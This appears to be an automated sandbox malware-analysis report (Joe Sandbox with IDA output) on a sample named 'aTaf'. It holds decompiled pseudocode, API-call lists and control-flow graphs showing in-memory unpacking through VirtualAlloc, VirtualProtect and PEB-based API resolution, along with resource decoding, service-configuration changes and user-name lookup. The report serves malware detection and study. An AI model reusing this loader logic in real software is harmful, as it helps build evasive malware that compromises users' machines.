                              													_t402 = E0040AD90(0x80004003);
                              												}
                              												_t469 =  *(_t564 + 0x40);
                              												_t555 = _t402;
                              												__eflags = _t469;
                              												if(_t469 == 0) {
                              													_t531 = 0;
                              													__eflags = 0;
                              												} else {
                              													_t531 =  *_t469;
                              												}
                              												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                              												__imp__#411(0xc, 0, 0);
                              												_t471 =  *(_t564 + 0x3c);
                              												__eflags = _t471;
                              												if(_t471 == 0) {
                              													E0040AD90(0x80004003);
                              												}
                              												_t405 =  *(_t564 + 0x38);
                              												__eflags = _t405;
                              												if(_t405 == 0) {
                              													_t514 = 0;
                              													__eflags = 0;
                              												} else {
                              													_t514 =  *_t405;
                              												}
                              												_t563 = _t564 - 0x10;
                              												_t407 = _t563;
                              												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                              												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                              												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                              												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                              												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                              												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                              												_t538 = __imp__#9; // 0x777dcf00
                              												_t538->i(_t563 + 0xa4);
                              												E004019A0(_t563 + 0x38);
                              												_t538->i(_t563 + 0x94);
                              												_t413 =  *(_t563 + 0x3c);
                              												__eflags = _t413;
                              												if(_t413 != 0) {
                              													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                              												}
                              												E004019A0(_t563 + 0x40);
                              												_t415 =  *(_t563 + 0x34);
                              												__eflags = _t415;
                              												if(_t415 != 0) {
                              													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                              												}
                              											}
                              										}
                              									}
                              									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                              									__eflags = _t379 - _t563 + 0x178;
                              									if(__eflags != 0) {
                              										_push(_t379);
                              										E0040B6B5(0, _t528, _t538, __eflags);
                              										_t563 = _t563 + 4;
                              									}
                              								}
                              							}
                              							_t369 =  *(_t563 + 0x54);
                              							__eflags = _t369;
                              							if(_t369 != 0) {
                              								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                              							}
                              							_t370 =  *(_t563 + 0x58);
                              							__eflags = _t370;
                              							if(_t370 != 0) {
                              								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                              							}
                              						}
                              						goto L80;
                              					} else {
                              						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                              						_t565 = _t557 + 8;
                              						_t547 = _t428;
                              						_t520 = _t565 + 0x298;
                              						while(1) {
                              							_t429 =  *_t520;
                              							if(_t429 !=  *_t547) {
                              								break;
                              							}
                              							if(_t429 == 0) {
                              								L7:
                              								_t429 = 0;
                              							} else {
                              								_t493 =  *((intOrPtr*)(_t520 + 1));
                              								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                              									break;
                              								} else {
                              									_t520 = _t520 + 2;
                              									_t547 = _t547 + 2;
                              									if(_t493 != 0) {
                              										continue;
                              									} else {
                              										goto L7;
                              									}
                              								}
                              							}
                              							L9:
                              							if(_t429 != 0) {
                              								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                              								_t557 = _t565 + 8;
                              								_t548 = _t431;
                              								_t488 = _t557 + 0x298;
                              								while(1) {
                              									_t432 =  *_t488;
                              									__eflags = _t432 -  *_t548;
                              									if(_t432 !=  *_t548) {
                              										break;
                              									}
                              									__eflags = _t432;
                              									if(_t432 == 0) {
                              										L16:
                              										_t432 = 0;
                              									} else {
                              										_t432 =  *((intOrPtr*)(_t488 + 1));
                              										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                              										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                              											break;
                              										} else {
                              											_t488 = _t488 + 2;
                              											_t548 = _t548 + 2;
                              											__eflags = _t432;
                              											if(_t432 != 0) {
                              												continue;
                              											} else {
                              												goto L16;
                              											}
                              										}
                              									}
                              									L18:
                              									__eflags = _t432;
                              									if(_t432 == 0) {
                              										goto L10;
                              									} else {
                              										_t435 = Module32Next(_t525, _t557 + 0x278);
                              										__eflags = _t435;
                              										if(_t435 != 0) {
                              											do {
                              												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                              												_t566 = _t557 + 8;
                              												_t549 = _t437;
                              												_t490 = _t566 + 0x298;
                              												while(1) {
                              													_t438 =  *_t490;
                              													__eflags = _t438 -  *_t549;
                              													if(_t438 !=  *_t549) {
                              														break;
                              													}
                              													__eflags = _t438;
                              													if(_t438 == 0) {
                              														L26:
                              														_t438 = 0;
                              													} else {
                              														_t438 =  *((intOrPtr*)(_t490 + 1));
                              														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                              														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                              															break;
                              														} else {
                              															_t490 = _t490 + 2;
                              															_t549 = _t549 + 2;
                              															__eflags = _t438;
                              															if(_t438 != 0) {
                              																continue;
                              															} else {
                              																goto L26;
                              															}
                              														}
                              													}
                              													L28:
                              													__eflags = _t438;
                              													if(_t438 == 0) {
                              														goto L10;
                              													} else {
                              														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                              														_t557 = _t566 + 8;
                              														_t550 = _t439;
                              														_t492 = _t557 + 0x298;
                              														while(1) {
                              															_t440 =  *_t492;
                              															__eflags = _t440 -  *_t550;
                              															if(_t440 !=  *_t550) {
                              																break;
                              															}
                              															__eflags = _t440;
                              															if(_t440 == 0) {
                              																L34:
                              																_t440 = 0;
                              															} else {
                              																_t440 =  *((intOrPtr*)(_t492 + 1));
                              																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                              																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                              																	break;
                              																} else {
                              																	_t492 = _t492 + 2;
                              																	_t550 = _t550 + 2;
                              																	__eflags = _t440;
                              																	if(_t440 != 0) {
                              																		continue;
                              																	} else {
                              																		goto L34;
                              																	}
                              																}
                              															}
                              															L36:
                              															__eflags = _t440;
                              															if(_t440 == 0) {
                              																goto L10;
                              															} else {
                              																goto L37;
                              															}
                              															goto L81;
                              														}
                              														asm("sbb eax, eax");
                              														asm("sbb eax, 0xffffffff");
                              														goto L36;
                              													}
                              													goto L81;
                              												}
                              												asm("sbb eax, eax");
                              												asm("sbb eax, 0xffffffff");
                              												goto L28;
                              												L37:
                              												_t442 = Module32Next(_t525, _t557 + 0x278);
                              												__eflags = _t442;
                              											} while (_t442 != 0);
                              										}
                              										goto L38;
                              									}
                              									goto L81;
                              								}
                              								asm("sbb eax, eax");
                              								asm("sbb eax, 0xffffffff");
                              								goto L18;
                              							} else {
                              								L10:
                              								CloseHandle(_t525);
                              								return 0;
                              							}
                              							goto L81;
                              						}
                              						asm("sbb eax, eax");
                              						asm("sbb eax, 0xffffffff");
                              						goto L9;
                              					}
                              				}
                              				L81:
                              			}

































































































                              0x004019f0
                              0x004019f0
                              0x004019fd
                              0x00401a10
                              0x00401a15
                              0x00401a1a
                              0x00401a1f
                              0x00401a24
                              0x00401a29
                              0x00401a2e
                              0x00401a33
                              0x00401a38
                              0x00401a3d
                              0x00401a42
                              0x00401a47
                              0x00401a4c
                              0x00401a51
                              0x00401a56
                              0x00401a5b
                              0x00401a60
                              0x00401a65
                              0x00401a6a
                              0x00401a6f
                              0x00401a74
                              0x00401a79
                              0x00401a7e
                              0x00401a83
                              0x00401a88
                              0x00401a8d
                              0x00401a92
                              0x00401a97
                              0x00401a9c
                              0x00401aa1
                              0x00401aa6
                              0x00401aab
                              0x00401ab0
                              0x00401ab9
                              0x00401aba
                              0x00401abf
                              0x00401ac7
                              0x0040248d
                              0x0040248d
                              0x00402496
                              0x00401acd
                              0x00401ad6
                              0x00401ae2
                              0x00401ae6
                              0x00401af1
                              0x00401af6
                              0x00401afb
                              0x00401b00
                              0x00401b05
                              0x00401b0a
                              0x00401b0f
                              0x00401b14
                              0x00401b19
                              0x00401b1e
                              0x00401b23
                              0x00401b28
                              0x00401b2d
                              0x00401b32
                              0x00401b37
                              0x00401b3c
                              0x00401b41
                              0x00401b46
                              0x00401b4b
                              0x00401b50
                              0x00401b55
                              0x00401b5a
                              0x00401b5f
                              0x00401b64
                              0x00401b69
                              0x00401b6e
                              0x00401b73
                              0x00401b78
                              0x00401b7d
                              0x00401b85
                              0x00401b8d
                              0x00401b95
                              0x00401b9d
                              0x00401ba4
                              0x00401ba9
                              0x00401bae
                              0x00401bb3
                              0x00401bb8
                              0x00401bbd
                              0x00401bc2
                              0x00401bc7
                              0x00401bcc
                              0x00401bd1
                              0x00401bd6
                              0x00401bdb
                              0x00401be0
                              0x00401be5
                              0x00401bea
                              0x00401bef
                              0x00401bf4
                              0x00401bf9
                              0x00401bfe
                              0x00401c03
                              0x00401c08
                              0x00401c0d
                              0x00401c12
                              0x00401c17
                              0x00401c1c
                              0x00401c21
                              0x00401c26
                              0x00401c2b
                              0x00401c30
                              0x00401c35
                              0x00401c3a
                              0x00401c3f
                              0x00401c44
                              0x00401c48
                              0x00401c4f
                              0x00401dc3
                              0x00401dc4
                              0x00401de0
                              0x00401de2
                              0x00401de7
                              0x00401dec
                              0x00401df1
                              0x00401df6
                              0x00401dfb
                              0x00401e00
                              0x00401e05
                              0x00401e0a
                              0x00401e0f
                              0x00401e14
                              0x00401e19
                              0x00401e1e
                              0x00401e23
                              0x00401e28
                              0x00401e2d
                              0x00401e32
                              0x00401e37
                              0x00401e3c
                              0x00401e41
                              0x00401e46
                              0x00401e4b
                              0x00401e50
                              0x00401e55
                              0x00401e5a
                              0x00401e5f
                              0x00401e64
                              0x00401e69
                              0x00401e6e
                              0x00401e73
                              0x00401e78
                              0x00401e7d
                              0x00401e82
                              0x00401e86
                              0x00401e8b
                              0x00401e96
                              0x00401e9a
                              0x00401ea4
                              0x00401eaf
                              0x00401eba
                              0x00401ebf
                              0x00401ec4
                              0x00401ec6
                              0x00401ecb
                              0x00401ece
                              0x00401ed2
                              0x00401ed4
                              0x00401eef
                              0x00401ed6
                              0x00401edd
                              0x00401ee2
                              0x00401ee6
                              0x00401ee9
                              0x00401ee9
                              0x00401ef7
                              0x00401efc
                              0x00401f02
                              0x00401f08
                              0x00401f0c
                              0x00401f15
                              0x00401f18
                              0x00401f1a
                              0x00401f1c
                              0x00401f22
                              0x00401f22
                              0x00401f24
                              0x00401f28
                              0x00401f2f
                              0x00401f33
                              0x00401f33
                              0x00401f40
                              0x00401f45
                              0x00401f4a
                              0x00401f4b
                              0x00401f50
                              0x00401f58
                              0x00401f58
                              0x00401f58
                              0x00401f58
                              0x00401f33
                              0x00401f63
                              0x00401f63
                              0x00401f69
                              0x00401f72
                              0x00401f72
                              0x00401f72
                              0x00401f73
                              0x00401f75
                              0x00401f7b
                              0x00401f80
                              0x00401f81
                              0x00401f86
                              0x00401f86
                              0x00401f8c
                              0x00401f8d
                              0x00401f8d
                              0x00401f9d
                              0x00401fa2
                              0x00401fa6
                              0x00401fac
                              0x00401faf
                              0x00401fb6
                              0x00401fbf
                              0x00401fc4
                              0x00401fc8
                              0x00401fce
                              0x00401fd3
                              0x00401fe0
                              0x00401fec
                              0x00401ffe
                              0x00402001
                              0x00402006
                              0x0040200b
                              0x00402010
                              0x00402015
                              0x0040201a
                              0x0040201f
                              0x00402024
                              0x00402029
                              0x0040202e
                              0x00402033
                              0x00402038
                              0x0040203d
                              0x00402042
                              0x00402047
                              0x0040204c
                              0x00402051
                              0x00402056
                              0x0040205b
                              0x00402060
                              0x00402065
                              0x0040206a
                              0x0040206f
                              0x00402074
                              0x00402079
                              0x0040207e
                              0x00402083
                              0x00402088
                              0x0040208d
                              0x00402092
                              0x00402097
                              0x0040209c
                              0x004020a1
                              0x004020a5
                              0x004020aa
                              0x004020ae
                              0x004020b4
                              0x004020b6
                              0x004020bb
                              0x004020c0
                              0x004020c5
                              0x004020ca
                              0x004020cf
                              0x004020d4
                              0x004020e1
                              0x004020e6
                              0x004020eb
                              0x004020f0
                              0x004020f5
                              0x004020fa
                              0x004020ff
                              0x00402104
                              0x00402109
                              0x0040210e
                              0x00402113
                              0x00402118
                              0x0040211d
                              0x00402122
                              0x00402127
                              0x0040212c
                              0x00402131
                              0x00402136
                              0x0040213b
                              0x00402140
                              0x00402145
                              0x0040214a
                              0x0040214f
                              0x00402154
                              0x00402159
                              0x0040215e
                              0x00402163
                              0x00402167
                              0x0040216c
                              0x00402171
                              0x00402177
                              0x00402179
                              0x0040217c
                              0x0040217e
                              0x00402183
                              0x00402188
                              0x0040218f
                              0x00402196
                              0x0040219a
                              0x0040219e
                              0x004021a2
                              0x004021a4
                              0x004021bc
                              0x004021be
                              0x004021c0
                              0x004021c6
                              0x004021ca
                              0x004021e5
                              0x004021ec
                              0x004021f1
                              0x00402213
                              0x00402215
                              0x00402217
                              0x0040221d
                              0x00402239
                              0x0040223b
                              0x0040223d
                              0x00402243
                              0x0040224d
                              0x0040224f
                              0x00402251
                              0x00402260
                              0x00402264
                              0x00402269
                              0x00402277
                              0x0040227b
                              0x00402286
                              0x00402293
                              0x004022af
                              0x004022b1
                              0x004022b5
                              0x004022b7
                              0x004022be
                              0x004022be
                              0x004022d7
                              0x004022e8
                              0x004022ef
                              0x004022f6
                              0x00402300
                              0x00402304
                              0x00402308
                              0x00402315
                              0x0040231a
                              0x0040231e
                              0x00402324
                              0x00402328
                              0x0040232a
                              0x00402331
                              0x00402331
                              0x0040234e
                              0x00402350
                              0x00402352
                              0x00402355
                              0x00402355
                              0x0040235b
                              0x0040235f
                              0x00402361
                              0x00402368
                              0x00402368
                              0x0040236d
                              0x00402371
                              0x00402373
                              0x00402375
                              0x0040237b
                              0x0040237b
                              0x00402377
                              0x00402377
                              0x00402377
                              0x00402390
                              0x00402396
                              0x0040239c
                              0x004023a0
                              0x004023a2
                              0x004023a9
                              0x004023a9
                              0x004023ae
                              0x004023b2
                              0x004023b4
                              0x004023ba
                              0x004023ba
                              0x004023b6
                              0x004023b6
                              0x004023b6
                              0x004023ce
                              0x004023d1
                              0x004023d3
                              0x004023dd
                              0x004023ec
                              0x004023ef
                              0x004023fe
                              0x00402401
                              0x00402403
                              0x00402411
                              0x00402417
                              0x00402424
                              0x00402426
                              0x0040242a
                              0x0040242c
                              0x00402434
                              0x00402434
                              0x0040243a
                              0x0040243f
                              0x00402443
                              0x00402445
                              0x0040244d
                              0x0040244d
                              0x00402445
                              0x00402251
                              0x0040223d
                              0x0040244f
                              0x0040245d
                              0x0040245f
                              0x00402461
                              0x00402462
                              0x00402467
                              0x00402467
                              0x0040245f
                              0x004021ca
                              0x0040246a
                              0x0040246e
                              0x00402470
                              0x00402478
                              0x00402478
                              0x0040247a
                              0x0040247e
                              0x00402480
                              0x00402488
                              0x00402488
                              0x00402480
                              0x00000000
                              0x00401c55
                              0x00401c62
                              0x00401c67
                              0x00401c6a
                              0x00401c6c
                              0x00401c73
                              0x00401c73
                              0x00401c77
                              0x00000000
                              0x00000000
                              0x00401c7b
                              0x00401c8f
                              0x00401c8f
                              0x00401c7d
                              0x00401c7d
                              0x00401c83
                              0x00000000
                              0x00401c85
                              0x00401c85
                              0x00401c88
                              0x00401c8d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401c8d
                              0x00401c83
                              0x00401c98
                              0x00401c9a
                              0x00401cbd
                              0x00401cc2
                              0x00401cc5
                              0x00401cc7
                              0x00401cd0
                              0x00401cd0
                              0x00401cd2
                              0x00401cd4
                              0x00000000
                              0x00000000
                              0x00401cd6
                              0x00401cd8
                              0x00401cec
                              0x00401cec
                              0x00401cda
                              0x00401cda
                              0x00401cdd
                              0x00401ce0
                              0x00000000
                              0x00401ce2
                              0x00401ce2
                              0x00401ce5
                              0x00401ce8
                              0x00401cea
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401cea
                              0x00401ce0
                              0x00401cf5
                              0x00401cf5
                              0x00401cf7
                              0x00000000
                              0x00401cf9
                              0x00401d02
                              0x00401d07
                              0x00401d09
                              0x00401d10
                              0x00401d1d
                              0x00401d22
                              0x00401d25
                              0x00401d27
                              0x00401d30
                              0x00401d30
                              0x00401d32
                              0x00401d34
                              0x00000000
                              0x00000000
                              0x00401d36
                              0x00401d38
                              0x00401d4c
                              0x00401d4c
                              0x00401d3a
                              0x00401d3a
                              0x00401d3d
                              0x00401d40
                              0x00000000
                              0x00401d42
                              0x00401d42
                              0x00401d45
                              0x00401d48
                              0x00401d4a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401d4a
                              0x00401d40
                              0x00401d55
                              0x00401d55
                              0x00401d57
                              0x00000000
                              0x00401d5d
                              0x00401d6a
                              0x00401d6f
                              0x00401d72
                              0x00401d74
                              0x00401d80
                              0x00401d80
                              0x00401d82
                              0x00401d84
                              0x00000000
                              0x00000000
                              0x00401d86
                              0x00401d88
                              0x00401d9c
                              0x00401d9c
                              0x00401d8a
                              0x00401d8a
                              0x00401d8d
                              0x00401d90
                              0x00000000
                              0x00401d92
                              0x00401d92
                              0x00401d95
                              0x00401d98
                              0x00401d9a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401d9a
                              0x00401d90
                              0x00401da5
                              0x00401da5
                              0x00401da7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401da7
                              0x00401da0
                              0x00401da2
                              0x00000000
                              0x00401da2
                              0x00000000
                              0x00401d57
                              0x00401d50
                              0x00401d52
                              0x00000000
                              0x00401dad
                              0x00401db6
                              0x00401dbb
                              0x00401dbb
                              0x00401d10
                              0x00000000
                              0x00401d09
                              0x00000000
                              0x00401cf7
                              0x00401cf0
                              0x00401cf2
                              0x00000000
                              0x00401c9c
                              0x00401c9c
                              0x00401c9d
                              0x00401caf
                              0x00401caf
                              0x00000000
                              0x00401c9a
                              0x00401c93
                              0x00401c95
                              0x00000000
                              0x00401c95
                              0x00401c4f
                              0x00000000

                              APIs
                              • OleInitialize.OLE32(00000000), ref: 004019FD
                              • _getenv.LIBCMT ref: 00401ABA
                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                              • Module32First.KERNEL32 ref: 00401C48
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                              • Module32Next.KERNEL32 ref: 00401D02
                              • Module32Next.KERNEL32 ref: 00401DB6
                              • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                              • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                              • _malloc.LIBCMT ref: 00401EBA
                              • _memset.LIBCMT ref: 00401EDD
                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                              • API String ID: 1430744539-2962942730
                              • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                              • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 256 50092b-500970 GetPEB 257 500972-500978 256->257 258 50097a-50098a call 500d35 257->258 259 50098c-50098e 257->259 258->259 264 500992-500994 258->264 259->257 261 500990 259->261 263 500996-500998 261->263 265 500a3b-500a3e 263->265 264->263 266 50099d-5009d3 264->266 267 5009dc-5009ee call 500d0c 266->267 270 5009f0-500a3a 267->270 271 5009d5-5009d8 267->271 270->265 271->267
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .$GetProcAddress.$l
                              • API String ID: 0-2784972518
                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                              • Instruction ID: c82c370464328a4a26a1431275042aa0e07294963062ef4ecf674b9c31d5cdc2
                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                              • Instruction Fuzzy Hash: 74318AB6900609DFDB10CF99C880BAEBBF9FF48324F24544AD841A7391D771EA45CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 279 22fa1a8-22fa232 281 22fa26b-22fa28d 279->281 282 22fa234-22fa23e 279->282 287 22fa28f-22fa29c 281->287 288 22fa2c9-22fa2ea 281->288 282->281 283 22fa240-22fa242 282->283 285 22fa265-22fa268 283->285 286 22fa244-22fa24e 283->286 285->281 289 22fa252-22fa261 286->289 290 22fa250 286->290 287->288 292 22fa29e-22fa2a0 287->292 296 22fa2ec-22fa2f6 288->296 297 22fa323-22fa345 288->297 289->289 291 22fa263 289->291 290->289 291->285 293 22fa2c3-22fa2c6 292->293 294 22fa2a2-22fa2ac 292->294 293->288 298 22fa2ae 294->298 299 22fa2b0-22fa2bf 294->299 296->297 300 22fa2f8-22fa2fa 296->300 307 22fa347-22fa354 297->307 308 22fa381-22fa3a2 297->308 298->299 299->299 301 22fa2c1 299->301 302 22fa31d-22fa320 300->302 303 22fa2fc-22fa306 300->303 301->293 302->297 305 22fa30a-22fa319 303->305 306 22fa308 303->306 305->305 309 22fa31b 305->309 306->305 307->308 310 22fa356-22fa358 307->310 314 22fa3db-22fa3fd 308->314 315 22fa3a4-22fa3ae 308->315 309->302 312 22fa37b-22fa37e 310->312 313 22fa35a-22fa364 310->313 312->308 316 22fa368-22fa377 313->316 317 22fa366 313->317 325 22fa3ff-22fa40c 314->325 326 22fa439-22fa4b0 ChangeServiceConfigA 314->326 315->314 318 22fa3b0-22fa3b2 315->318 316->316 319 22fa379 316->319 317->316 320 22fa3d5-22fa3d8 318->320 321 22fa3b4-22fa3be 318->321 319->312 320->314 323 22fa3c2-22fa3d1 321->323 324 22fa3c0 321->324 323->323 327 22fa3d3 323->327 324->323 325->326 328 22fa40e-22fa410 325->328 334 22fa4b9-22fa4f8 326->334 335 22fa4b2-22fa4b8 326->335 327->320 329 22fa433-22fa436 328->329 330 22fa412-22fa41c 328->330 329->326 332 22fa41e 330->332 333 22fa420-22fa42f 330->333 332->333 333->333 336 22fa431 333->336 339 22fa4fa-22fa4fe 334->339 340 22fa508-22fa50c 334->340 335->334 336->329 339->340 343 22fa500 339->343 341 22fa50e-22fa512 340->341 342 22fa51c-22fa520 340->342 341->342 344 22fa514 341->344 345 22fa522-22fa526 342->345 346 22fa530-22fa534 342->346 343->340 344->342 345->346 347 22fa528 345->347 348 22fa536-22fa53a 346->348 349 22fa544-22fa548 346->349 347->346 348->349 350 22fa53c 348->350 351 22fa54a-22fa54e 349->351 352 22fa558-22fa55c 349->352 350->349 351->352 355 22fa550 351->355 353 22fa55e-22fa562 352->353 354 22fa56c 352->354 353->354 356 22fa564 353->356 355->352 356->354
                              APIs
                              • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 022FA4A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ChangeConfigService
                              • String ID:
                              • API String ID: 3849694230-0
                              • Opcode ID: 7ceb7e82ce3a90c172c93637bed3c43ef868969cb0dc1bccb4c2a236cbe38e31
                              • Instruction ID: 283c3130d921aa34266bd0c492cdbfc0b2e8a49d3b8516c479aa7ef35e374a2b
                              • Opcode Fuzzy Hash: 7ceb7e82ce3a90c172c93637bed3c43ef868969cb0dc1bccb4c2a236cbe38e31
                              • Instruction Fuzzy Hash: EDC13C71E2061A8FDB50CFE8C8857AEFBF1BB44314F148539E959E6288D7749885CF81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 357 22f96a8-22f970f 359 22f977e-22f9782 357->359 360 22f9711-22f9736 357->360 361 22f97c6-22f9804 GetUserNameA 359->361 362 22f9784-22f97c2 359->362 369 22f9738-22f973a 360->369 370 22f9766-22f976b 360->370 364 22f980d-22f9823 361->364 365 22f9806-22f980c 361->365 362->361 366 22f9839-22f9860 364->366 367 22f9825-22f9831 364->367 365->364 378 22f9862-22f9866 366->378 379 22f9870 366->379 367->366 373 22f975c-22f9764 369->373 374 22f973c-22f9746 369->374 375 22f976d-22f9779 370->375 373->375 381 22f974a-22f9758 374->381 382 22f9748 374->382 375->359 378->379 383 22f9868 378->383 381->381 384 22f975a 381->384 382->381 383->379 384->373
                              APIs
                              • GetUserNameA.ADVAPI32(00000000), ref: 022F97F4
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: 4703883e0c702f337ada54d4dd1b9c7bf5e096f46dc06e9b78397ab670c49ffc
                              • Instruction ID: f7c6d622ec94a9f6ecdfc4e1027467948d1645167f302384a637f530ddeec72e
                              • Opcode Fuzzy Hash: 4703883e0c702f337ada54d4dd1b9c7bf5e096f46dc06e9b78397ab670c49ffc
                              • Instruction Fuzzy Hash: 115124B4D102098FDB18CFA9C994BDEFBF5AF48304F248429E816AB395D7749885CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 152 50003c-500047 153 500049 152->153 154 50004c-500263 call 500a3f call 500e0f call 500d90 VirtualAlloc 152->154 153->154 169 500265-500289 call 500a69 154->169 170 50028b-500292 154->170 175 5002ce-5003c2 VirtualProtect call 500cce call 500ce7 169->175 172 5002a1-5002b0 170->172 174 5002b2-5002cc 172->174 172->175 174->172 181 5003d1-5003e0 175->181 182 5003e2-500437 call 500ce7 181->182 183 500439-5004b8 VirtualFree 181->183 182->181 185 5005f4-5005fe 183->185 186 5004be-5004cd 183->186 189 500604-50060d 185->189 190 50077f-500789 185->190 188 5004d3-5004dd 186->188 188->185 192 5004e3-500505 188->192 189->190 195 500613-500637 189->195 193 5007a6-5007b0 190->193 194 50078b-5007a3 190->194 203 500517-500520 192->203 204 500507-500515 192->204 196 5007b6-5007cb 193->196 197 50086e-5008be LoadLibraryA 193->197 194->193 198 50063e-500648 195->198 200 5007d2-5007d5 196->200 202 5008c7-5008f9 197->202 198->190 201 50064e-50065a 198->201 205 500824-500833 200->205 206 5007d7-5007e0 200->206 201->190 207 500660-50066a 201->207 209 500902-50091d 202->209 210 5008fb-500901 202->210 211 500526-500547 203->211 204->211 208 500839-50083c 205->208 212 5007e2 206->212 213 5007e4-500822 206->213 214 50067a-500689 207->214 208->197 215 50083e-500847 208->215 210->209 218 50054d-500550 211->218 212->205 213->200 216 500750-50077a 214->216 217 50068f-5006b2 214->217 219 500849 215->219 220 50084b-50086c 215->220 216->198 221 5006b4-5006ed 217->221 222 5006ef-5006fc 217->222 224 5005e0-5005ef 218->224 225 500556-50056b 218->225 219->197 220->208 221->222 226 50074b 222->226 227 5006fe-500748 222->227 224->188 228 50056d 225->228 229 50056f-50057a 225->229 226->214 227->226 228->224 230 50059b-5005bb 229->230 231 50057c-500599 229->231 236 5005bd-5005db 230->236 231->236 236->218
                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0050024D
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
